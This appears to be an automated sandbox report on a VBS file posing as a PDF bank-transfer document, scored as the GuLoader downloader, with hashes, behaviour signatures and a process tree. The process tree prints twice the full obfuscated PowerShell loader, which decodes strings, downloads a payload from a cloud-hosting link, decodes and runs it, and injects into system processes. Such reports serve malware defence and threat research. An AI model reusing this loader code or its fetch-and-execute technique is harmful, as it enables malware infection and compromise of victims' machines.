Overview

overview

10

Static

static

1

pko_trans_...df.vbs

windows7-x64

10

pko_trans_...df.vbs

windows10-2004-x64

10

Resubmissions

13-09-2024 07:40

240913-jhhq3a1hjq 8

13-09-2024 07:26

240913-h9trza1ekr 8

09-09-2024 06:56

240909-hqwgfsyeka 10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2024 06:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pko_trans_details_20240909_105339·pdf.vbs

  • Size

    34KB

  • MD5

    f47be72a96dd07190c9636231654dfe5

  • SHA1

    b0f23fa8a4669111d04e442e81888330f76b5689

  • SHA256

    8317fc4b7eb8d40478a79de9fc539469ab5b2904822894ac6eee27f7cf9e6ce9

  • SHA512

    a739b342622f6949f3238b18b8c51ecbddfa61ddd6d2b18b83bff9f9b72a9c9774aca871f547ace1d41a123d756e3498babd6eb42d9b4e42f3c32e2ec91bdc56

  • SSDEEP

    192:oM+q8B50G4urQDIN9+H27uci5akloQROGHb0m1f8uk2R6Ct9gpCIHOmJTmFLauQ:l8Lv4urQ89mAu9YzafAGk2RnyYBPTQ

Score
10/10
guloaderdiscoverydownloaderexecution

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 61 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 60 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240909_105339·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
        3⤵
          PID:3124
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4956
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2344
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1380
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1176
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2056
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:860
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4140
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:232
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4604
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4564
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2428
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3168
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3836
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4940
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4988
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4668
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4624
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2032
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2168
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4932
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:116
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4268
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4976
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1184
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2040
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1676
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:3260
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1444
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2708
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4212
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1724
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1920
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:916
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1500
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2956
